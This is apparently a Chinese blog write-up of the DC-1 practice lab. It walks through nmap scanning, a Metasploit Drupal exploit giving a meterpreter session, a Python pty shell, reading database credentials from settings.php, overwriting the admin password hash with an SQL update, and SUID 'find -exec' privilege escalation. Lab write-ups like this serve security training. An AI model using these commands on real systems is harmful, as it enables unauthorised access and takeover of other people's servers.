zoukankan      html  css  js  c++  java
  • DC1靶场复现

    DC1靶场复现记录

    信息收集

    • namp扫描,探测同网段存活主机

      nmap -sP 192.168.233.0/24 --exclude 192.168.233.145

    image-20201219110358275

    • 确定主机 192.168.233.141 nmap收集详细信息

      nmap -A -vv -T4 192.168.233.141

    image-20201219110958062

    • 发现22 80 111 端口开放,从80端口入手
      • 打开网页浏览:192.168.233.141:80 发现是典型的drupal,存在漏洞的

    image-20201219111204094

    利用过程

    • 直接msf搜索drupal漏洞

      image-20201219111529651

    • 利用最新的2018的

      image-20201219111625640

    • 设置参数 rhost

      image-20201219111733362

    • yes的全部设置完毕,run攻击

      image-20201219111837860

    • 返回一个meterpreter

    image-20201219111937271

    • 使用python反弹一个交互式shell

      python -c "import pty;pty.spawn('/bin/bash')"

    image-20201219112134728

    • 进入home目录,发现flag4文件,提示需要提升权限

    image-20201219112402735

    • 在www目录下发现flag1.txt,内容提示寻找站点的配置文件

    image-20201219112647346

    • 寻找站点的配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看

      image-20201219112855209

    • 发现数据库用户名和密码,连接数据库

      image-20201219113048527

    • 找user表,看admin用户名密码

    image-20201219113600934

    image-20201219113929592

    • 数据库中更新

      update users set pass="$S$DaqVf8o7HqKLOhCBZZRfmYeM9MuX/2HYi6MTCSYOH9wpf01gqbod" where name="admin";

    image-20201219114308113

    • 更新成功,直接浏览器登录,发现flag3 提示sudo提权

      image-20201219115638091

    提权

    • 使用find提权

      find命令是在指定目录下查找文件,并返回查找到的子目录和全部文件 -exec<执行指令>:假设find指令的回传值为True,就执行该指令 #如果find有suid权限,那就可以通过find执行任意root命令

    • 利用

      cd /tmp

      touch test

      find test -exec "/bin/sh" ;

    image-20201219115859559

    • 查看flag4

      image-20201219115948675

  • 相关阅读:
    02 微服务应用的认证与授权
    01 微服务架构中的服务发现作用以及两种协议的调用区别
    04 redis的数据结构与对象
    03 Spring的事务管理的基本使用
    02 Spring的AOP的基础概念与简单使用
    k8s环境部署
    elk安装
    实现AD域验证登录--
    linux SSH各配置项解释
    Linux学习之SAMBA共享(密码验证)
  • 原文地址:https://www.cnblogs.com/liyu8/p/14158530.html
Copyright © 2011-2022 走看看